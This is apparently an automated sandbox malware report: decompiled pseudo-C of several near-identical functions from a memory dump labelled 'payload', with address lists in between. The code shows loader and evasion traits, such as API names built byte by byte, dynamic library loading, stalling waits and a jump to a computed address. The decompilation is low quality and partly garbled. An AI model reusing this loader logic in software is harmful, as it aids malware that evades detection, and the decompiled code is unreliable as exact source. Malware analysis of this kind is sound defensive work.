    0x004026c3
    0x004026c8
    0x004026cd
    0x004026cf
    0x00000000
    0x00000000
    0x004026d5
    0x004026da
    0x004026e5
    0x004026e6
    0x00401592
    0x00401592
    0x00401594
    0x00401597
    0x0040159c
    0x004015a8
    0x00000000
    0x004015ae
    0x004015ae
    0x004015b3
    0x004015be
    0x004015bf
    0x004015bf
    0x004015a8

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00401AD4, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 150synchronization
    C-Code - Quality: 47%
    			E00401AD4(signed int __eax, void* __ebx) {
				void* _t13;
				intOrPtr _t15;
				struct HINSTANCE__* _t19;
				intOrPtr _t20;
				struct HINSTANCE__* _t23;
				void* _t24;
				intOrPtr _t25;
				long _t27;
				intOrPtr* _t29;
				intOrPtr _t30;
				void* _t35;
				void* _t38;
				intOrPtr* _t42;
				void* _t46;
				void* _t50;
				void* _t52;
				intOrPtr* _t54;

				_t13 = E00402AD0(__eax ^ 0x004050cf);
				_push(1);
				 *_t54 =  *_t54 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t13) != 0) {
					L6:
					_push(1);
					 *_t54 =  *_t54 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t15 = E00401CAE(_t14); // executed
					__eflags = _t15;
					if(_t15 != 0) {
						L18:
						L19:
						goto L19;
					}
					__eflags = _t52 - 0xfd00;
					if(_t52 < 0xfd00) {
						goto L18;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t19 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t19;
					_t42 = "pejpCreate";
					 *_t42 = 0x70616548;
					 *((short*)(_t42 + 4)) = 0x7243;
					 *((short*)(_t42 + 6)) = 0x6165;
					_push(_t42);
					_push(_t19);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t19);
					_push(1);
					 *_t54 =  *_t54 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t20 = E00401CAE(_t19); // executed
					__eflags = _t20;
					if(_t20 != 0) {
						goto L18;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t23 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t52 - 4)) = _t23;
					_push(_t23);
					__eflags = _t23;
					if(_t23 == 0) {
						goto L18;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t24 = E00402E18(_t23); // executed
					_push("true");
					 *_t54 =  *_t54 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t25 = E00402BB3(_t24); // executed
					__eflags = _t25;
					if(_t25 != 0) {
						goto L18;
					}
					_push(0x1e);
					do {
						_t27 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t54 =  *_t54 - 1;
						__eflags =  *_t54;
					} while ( *_t54 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t27); // executed
					_pop(_t46);
					 *((intOrPtr*)(_t54 + 4)) =  *((intOrPtr*)(_t54 + 4)) +  *((intOrPtr*)(_t46 + 0x3c));
					_t50 = _t46;
					 *0x405002 = _t50 + 0xa4;
					_t29 =  *0x405002;
					_t30 =  *_t29;
					 *0x405002 = _t30;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L18;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L18;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t35);
					 *0x40501a =  *0x40501a + _t35;
					__eflags =  *((intOrPtr*)(_t52 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t52 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push(0xf);
				 *_t54 =  *_t54 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t14 != 0) {
					goto L6;
				}
				_push( *0x4050cf);
				_t38 = E00402AD0(_t14);
				_push(1);
				 *_t54 =  *_t54 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t38) != 0) {
					goto L6;
				}
				_push(0xf);
				 *_t54 =  *_t54 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t14 != 0) {
					goto L6;
				}
				_push(0xf);
				 *_t54 =  *_t54 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t14 != 0) {
					goto L6;
				}
				_push(E00402749);
				return E00402749;
			}




















    0x00401adb
    0x00401ae0
    0x00401ae2
    0x00401ae5
    0x00401aea
    0x00401af7
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401afd
    0x00401aff
    0x00401b02
    0x00401b07
    0x00401b14
    0x00000000
    0x00000000
    0x00401b1a
    0x00401b20
    0x00401b25
    0x00401b27
    0x00401b2a
    0x00401b2f
    0x00401b3b
    0x00000000
    0x00000000
    0x00401b41
    0x00401b43
    0x00401b46
    0x00401b4b
    0x00401b58
    0x00000000
    0x00000000
    0x00401b5e
    0x00401b60
    0x00401b63
    0x00401b68
    0x00401b74
    0x00000000
    0x00000000
    0x00401b80
    0x00401b81

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00402CDE, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 149synchronization
    C-Code - Quality: 46%
    			E00402CDE() {
				void* _t11;
				void* _t13;
				struct HINSTANCE__* _t17;
				void* _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				void* _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				intOrPtr* _t36;
				void* _t40;
				void* _t44;
				void* _t46;
				intOrPtr* _t48;
				void* _t58;

				_push(0xf);
				 *_t48 =  *_t48 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t11) != 0) {
					L1:
					_push(1);
					 *_t48 =  *_t48 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					if(_t13 != 0 || _t46 < 0xfd00) {
						L13:
						L14:
						goto L14;
					} else {
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t17 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t17;
						_t36 = "pejpCreate";
						 *_t36 = 0x70616548;
						 *((short*)(_t36 + 4)) = 0x7243;
						 *((short*)(_t36 + 6)) = 0x6165;
						_push(_t36);
						_push(_t17);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t17);
						_push(1);
						 *_t48 =  *_t48 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t18 = E00401CAE(_t17); // executed
						if(_t18 != 0) {
							goto L13;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
						 *((intOrPtr*)(_t46 - 4)) = _t21;
						_push(_t21);
						if(_t21 == 0) {
							goto L13;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t22 = E00402E18(_t21); // executed
						_push("true");
						 *_t48 =  *_t48 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t23 = E00402BB3(_t22); // executed
						if(_t23 != 0) {
							goto L13;
						}
						_push(0x1e);
						do {
							_t25 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t48 =  *_t48 - 1;
						} while ( *_t48 != 0);
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t25); // executed
						_pop(_t40);
						 *((intOrPtr*)(_t48 + 4)) =  *((intOrPtr*)(_t48 + 4)) +  *((intOrPtr*)(_t40 + 0x3c));
						_t44 = _t40;
						 *0x405002 = _t44 + 0xa4;
						_t27 =  *0x405002;
						_t28 =  *_t27;
						 *0x405002 = _t28;
						_t58 =  *0x405002 - 0xfff;
						if(_t58 > 0) {
							goto L13;
						}
						asm("sbb dword [ecx], 0xa0");
						if(_t58 < 0) {
							goto L13;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t33);
						 *0x40501a =  *0x40501a + _t33;
						if( *((intOrPtr*)(_t46 - 4)) != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
				}
				_push(1);
				 *__esp =  *__esp - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				__eax = E00401CAE(__eax);
				if(__eax != 0) {
					goto L1;
				}
				_push( *0x4050cf);
				__eax = E00402AD0(__eax);
				_push(0xf);
				 *__esp =  *__esp - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				__eax = E00402BB3(__eax);
				if(__eax != 0) {
					goto L1;
				}
				_push(1);
				 *__esp =  *__esp - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				__eax = E00401CAE(__eax);
				if(__eax != 0) {
					goto L1;
				}
				_push(1);
				 *__esp =  *__esp - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				__eax = E00401CAE(__eax);
				if(__eax != 0) {
					goto L1;
				}
				_push( *0x4050cf);
				__eax = 0x401ad5;
				_push(0x401ad5);
				return 0x401ad5;
			}




















    0x00402cde
    0x00402ce0
    0x00402ce3
    0x00402ce8
    0x00402cf4
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x00402cfa
    0x00402cfc
    0x00402cff
    0x00402d04
    0x00402d09
    0x00402d10
    0x00000000
    0x00000000
    0x00402d16
    0x00402d1c
    0x00402d21
    0x00402d23
    0x00402d26
    0x00402d2b
    0x00402d30
    0x00402d37
    0x00000000
    0x00000000
    0x00402d3d
    0x00402d3f
    0x00402d42
    0x00402d47
    0x00402d4c
    0x00402d53
    0x00000000
    0x00000000
    0x00402d59
    0x00402d5b
    0x00402d5e
    0x00402d63
    0x00402d68
    0x00402d6f
    0x00000000
    0x00000000
    0x00402d75
    0x00402d80
    0x00402d86
    0x00402d87

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00401BF1, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 149synchronization
    C-Code - Quality: 47%
    			E00401BF1() {
				void* _t11;
				intOrPtr _t13;
				struct HINSTANCE__* _t17;
				intOrPtr _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				intOrPtr _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				void* _t36;
				void* _t37;
				intOrPtr* _t39;
				void* _t43;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;

				_push(1);
				 *_t51 =  *_t51 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t11) != 0) {
					L6:
					_push(1);
					 *_t51 =  *_t51 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					__eflags = _t13;
					if(_t13 != 0) {
						L18:
						L19:
						goto L19;
					}
					__eflags = _t49 - 0xfd00;
					if(_t49 < 0xfd00) {
						goto L18;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t17 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t17;
					_t39 = "pejpCreate";
					 *_t39 = 0x70616548;
					 *((short*)(_t39 + 4)) = 0x7243;
					 *((short*)(_t39 + 6)) = 0x6165;
					_push(_t39);
					_push(_t17);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t17);
					_push(1);
					 *_t51 =  *_t51 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t18 = E00401CAE(_t17); // executed
					__eflags = _t18;
					if(_t18 != 0) {
						goto L18;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t49 - 4)) = _t21;
					_push(_t21);
					__eflags = _t21;
					if(_t21 == 0) {
						goto L18;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t22 = E00402E18(_t21); // executed
					_push("true");
					 *_t51 =  *_t51 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t23 = E00402BB3(_t22); // executed
					__eflags = _t23;
					if(_t23 != 0) {
						goto L18;
					}
					_push(0x1e);
					do {
						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t51 =  *_t51 - 1;
						__eflags =  *_t51;
					} while ( *_t51 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t25); // executed
					_pop(_t43);
					 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t51 + 4)) +  *((intOrPtr*)(_t43 + 0x3c));
					_t47 = _t43;
					 *0x405002 = _t47 + 0xa4;
					_t27 =  *0x405002;
					_t28 =  *_t27;
					 *0x405002 = _t28;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L18;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L18;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t33);
					 *0x40501a =  *0x40501a + _t33;
					__eflags =  *((intOrPtr*)(_t49 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t49 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push(0xf);
				 *_t51 =  *_t51 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t12 != 0) {
					goto L6;
				}
				_push( *0x4050cf);
				_t36 = E00402AD0(_t12);
				_push(1);
				 *_t51 =  *_t51 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t36) != 0) {
					goto L6;
				}
				_push(0xf);
				 *_t51 =  *_t51 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t12 != 0) {
					goto L6;
				}
				_push( *0x4050cf);
				_t37 = E00402AD0(_t12);
				_push(0xf);
				 *_t51 =  *_t51 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t37) != 0) {
					goto L6;
				}
				_push(E00402749);
				return E00402749;
			}





















    0x00401bf1
    0x00401bf3
    0x00401bf6
    0x00401bfb
    0x00401c08
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401c0e
    0x00401c10
    0x00401c13
    0x00401c18
    0x00401c25
    0x00000000
    0x00000000
    0x00401c2b
    0x00401c31
    0x00401c36
    0x00401c38
    0x00401c3b
    0x00401c40
    0x00401c4d
    0x00000000
    0x00000000
    0x00401c53
    0x00401c55
    0x00401c58
    0x00401c5d
    0x00401c6a
    0x00000000
    0x00000000
    0x00401c70
    0x00401c76
    0x00401c7b
    0x00401c7d
    0x00401c80
    0x00401c85
    0x00401c91
    0x00000000
    0x00000000
    0x00401c9d
    0x00401c9e

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00401811, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147synchronization
    C-Code - Quality: 45%
    			E00401811() {
				void* _t11;
				intOrPtr _t13;
				struct HINSTANCE__* _t17;
				intOrPtr _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				intOrPtr _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				intOrPtr* _t38;
				void* _t42;
				void* _t46;
				void* _t48;
				intOrPtr* _t50;

				_push(0xf);
				 *_t50 =  *_t50 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t11) != 0) {
					L6:
					_push(1);
					 *_t50 =  *_t50 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					__eflags = _t13;
					if(_t13 != 0) {
						L18:
						L19:
						goto L19;
					}
					__eflags = _t48 - 0xfd00;
					if(_t48 < 0xfd00) {
						goto L18;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t17 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t17;
					_t38 = "pejpCreate";
					 *_t38 = 0x70616548;
					 *((short*)(_t38 + 4)) = 0x7243;
					 *((short*)(_t38 + 6)) = 0x6165;
					_push(_t38);
					_push(_t17);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t17);
					_push(1);
					 *_t50 =  *_t50 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t18 = E00401CAE(_t17); // executed
					__eflags = _t18;
					if(_t18 != 0) {
						goto L18;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t48 - 4)) = _t21;
					_push(_t21);
					__eflags = _t21;
					if(_t21 == 0) {
						goto L18;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t22 = E00402E18(_t21); // executed
					_push("true");
					 *_t50 =  *_t50 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t23 = E00402BB3(_t22); // executed
					__eflags = _t23;
					if(_t23 != 0) {
						goto L18;
					}
					_push(0x1e);
					do {
						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t50 =  *_t50 - 1;
						__eflags =  *_t50;
					} while ( *_t50 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t25); // executed
					_pop(_t42);
					 *((intOrPtr*)(_t50 + 4)) =  *((intOrPtr*)(_t50 + 4)) +  *((intOrPtr*)(_t42 + 0x3c));
					_t46 = _t42;
					 *0x405002 = _t46 + 0xa4;
					_t27 =  *0x405002;
					_t28 =  *_t27;
					 *0x405002 = _t28;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L18;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L18;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t33);
					 *0x40501a =  *0x40501a + _t33;
					__eflags =  *((intOrPtr*)(_t48 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t48 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push(0xf);
				 *_t50 =  *_t50 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t12 != 0) {
					goto L6;
				}
				_push(1);
				 *_t50 =  *_t50 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(_t12 != 0) {
					goto L6;
				}
				_push(0xf);
				 *_t50 =  *_t50 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(_t12 != 0) {
					goto L6;
				}
				_push(1);
				 *_t50 =  *_t50 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(_t12 != 0) {
					goto L6;
				}
				_push("zzdjjqpqaxlgt");
				E00402E18(_t12);
				_push(E00402749);
				return E00402749;
			}



















    0x00401811
    0x00401813
    0x00401816
    0x0040181b
    0x00401828
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x0040182e
    0x00401830
    0x00401833
    0x00401838
    0x00401844
    0x00000000
    0x00000000
    0x0040184a
    0x0040184c
    0x0040184f
    0x00401854
    0x00401860
    0x00000000
    0x00000000
    0x00401866
    0x00401868
    0x0040186b
    0x00401870
    0x0040187d
    0x00000000
    0x00000000
    0x00401883
    0x00401885
    0x00401888
    0x0040188d
    0x00401899
    0x00000000
    0x00000000
    0x0040189f
    0x004018a4
    0x004018af
    0x004018b0

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
